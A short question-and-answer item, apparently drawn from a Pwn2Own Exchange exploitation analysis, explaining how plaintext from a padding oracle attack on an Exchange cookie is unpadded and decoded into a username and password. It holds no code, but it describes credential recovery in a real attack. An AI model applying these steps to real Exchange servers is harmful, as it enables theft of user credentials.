After completing the Padding Oracle Attack, how is the padded plaintext converted to the actual username and password?

The obtained padded plaintext is first unpadded using PKCS7 (the `unpad` function checks that the last byte value matches the number of padding bytes). Then the string is decoded as UTF-16LE (since Exchange uses Unicode), and the first two bytes are discarded (because they cannot be reliably decrypted). The remaining Base64-encoded string is decoded to reveal the actual plaintext in `username:password` format. The full username is already known from the `lgn` field in the cookie, so losing the first two characters of the username is not a problem. For more details on obtaining the cookie, refer to the companion Pwn2Own 2021 Microsoft Exchange Server Vulnerability (CVE-2021-31196) Exploitation Analysis.